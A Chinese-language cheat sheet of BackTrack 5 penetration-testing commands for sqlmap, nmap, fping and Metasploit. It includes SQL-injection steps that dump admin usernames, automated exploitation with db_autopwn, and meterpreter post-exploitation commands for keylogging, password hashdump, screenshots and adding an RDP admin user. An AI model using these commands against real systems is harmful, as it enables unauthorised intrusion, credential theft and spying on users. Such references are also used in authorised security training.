bt5常用命令

来源:互联网 发布:李光耀的书 知乎 编辑:程序博客网 时间:2024/04/28 14:32

sqlmap:
 ./sqlmap.py -u http://192.168.15.13:8088/dipan/notebook/file_show.php?file_id=13 检测注入
 ./sqlmap.py -u http://192.168.15.13:8088/dipan/notebook/file_show.php?file_id=13 --dbs列数据库
 ./sqlmap.py -u http://192.168.15.13:8088/dipan/notebook/file_show.php?file_id=13 -D shujuku  --tables 列选定数据库中的表
 ./sqlmap.py -u http://192.168.15.13:8088/dipan/notebook/file_show.php?file_id=13 -D shujuku -T adminuser --columns 列 表中的字段
 ./sqlmap.py -u http://192.168.15.13:8088/dipan/notebook/file_show.php?file_id=13 -D shujuku -T adminuser -C username --dump

 

ps -auxw 查看进程

首先使用ps -ef命令确定要杀死进程的PID,然后输入以下命令:
kill PID 指定进程PID

rdesktop 192.168.235.139:3389 连接远程桌面

sudo lsb_release -a 查看内核ubuntu版本

 

dpkg -i XXXXXX.deb  解压
who:显示当前已登录用户的信息
startx 开机
halt 关机
cp 复制
reboot 重启
nmap -sP 192.168.235.1/255
nmap -v -n -A IP  操作系统识别
nmap -v -n -sP 扫描端口
serach 要搜索的文件
show options
clear或者 ctrl+l  清屏
whois 域名/ip 查看域名的详细信息。
Fping:
-a 只显示存活IP
-s 扫描后统计
-r Ping次数
-g 扫描范围
fping -a -s -r 1 -g 220.190.19.1 220.190.19.255 探测主机存活数

nbtscan 192.168.235.1-255  扫描网关内的主机名MAC

ping 域名/ip 测试本机到远端主机是否联通。

dig 域名/ip 查看域名解析的详细信息。

host -l 域名 dns服务器 传输zone


BT5下NMAP使用命令

nmap -script=smb-check-vulns.nse IP  探测目标漏洞
Nmap -v -n -A IP 综合扫描

Nmap -v -sS -n -p1-65535 IP

Nmap -v -sS -p1-65535 -n -oX scan.xml -P0 IP

Nmap -v -sT -n -p1-65535  -PN IP

Nmap -v -p1-65535  -P0 IP

Nmap -v -p1-65535 -sS IP

Nmap -O IP 探测系统类型

Nmap -V -n -A IP
-p0  不ping

-PN 强制

-n 说是不多次解析DNS
nmap:
-sS 半开扫描TCP和SYN扫描。
-sT 完全TCP连接扫描。
-sU UDP扫描
-PS syn包探测(防火墙探测)
-PA ack包探测(防火墙探测)
-PN 不ping。
-n 不dns解析。
-A -O和-sV。
-O 操作系统识别。
-sV 服务版本信息(banner)
-p 端口扫描。
-T 设置时间级别(0-5)
-iL 导入扫描结果。
-oG 输出扫描结果。
操作系统识别:
p0f -i eth0 -U -p 开启混杂模式。
xprobe2 ip|域名 检测os。

 


Metasploit:

set payload windows/meterpreter/reverse_tcp 装载meterpreter

db_nmap -T Aggressive -sV -n -O -v 192.168.235.138 在msf中使用nmap扫描
db_destroy pentest

db_create pentest

db_hosts 查看数据库

db_services 查看端口及服务

db_autopwn -t -p -e  -e表示全自动攻击 -t使用所有的攻击模块 -i表示指定主机
db_del_host

meterpreter模块下常用命令


shell 获得一个cmd

run vnc 远程控制屏幕 要等一会儿.
ps 查看进程
  migtuid 1575  如果进程Id 使用后用户为administrator
screenshot 截取屏幕
keyscan_start 开启键盘记录
 
keyscan_dump 查看键盘记录
 
keyscan_stop 关闭键盘记录
hashdump  获取远程计算机所有账户密码
run getgui -e 打开3389
run getgui -u admin -p 123456   -u是用户 -p是密码

svn update 升级
msfupdate 升级

./msfweb Web接口127.0.0.1:55555。.

./msfconsole 字符下的Console。

help 帮助

show <option> 显示选项

search <name> 搜索名字

use <exploit name> 使用漏洞

show options  显示选项

set <OPTION NAME> <option> 设置选项

show payloads 显示装置

set PAYLOAD <payload name> 设置装置

show options  显示选项

set <OPTION NAME> <option> 设置选项

show targets  显示目标(os版本)

set TARGET <target number> 设置目标版本

exploit 开始漏洞攻击

sessions -l 列出会话

sessions -i <ID> 选择会话

sessions -k <ID> 结束会话

<ctrl> z  把会话放到后台

<ctrl> c  结束会话

jobs   列出漏洞运行工作

jobs -K  结束一个漏洞运行工作

查看进程
 PS


对目标主机的屏幕进行截图。
upload file
 
向目标主机上传文件。
download file
 
从目标主机下载文件。
keyscan_start
 
针对远程目标主机开启键盘记录功能。
keyscan_dump
 
存储目标主机上捕获的键盘记录。
keyscan_stop
 
停止针对目标主机的键盘记录。
getprivs

show auxiliary 显示辅助模块

use <auxiliary name> 使用辅助模块

set <OPTION NAME> <option> 设置选项

run  运行模块

scanner/smb/version 扫描系统版本

scanner/mssql/mssql_ping 测试mssql是否在线

scanner/mssql/mssql_login 测试登录(暴力或字典)

Attacker behind firewall:  bind shell正向

Target behind firewall:  reverse shell反向

Meterpreter衔接不懂dos的可以用这个:

db_import_nessus_nbe 加载nessus的扫描结果

db_import_nmap_xml 加载nmap的扫描结果

自动化攻击流程:

cd /pentest/exploit/framework3

./msfconsole

load db_sqlite3

 

字符接口攻击流程:

./msfcli | grep -i <name>

./msfcli <exploit or auxiliary> S

./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E

 

原创粉丝点击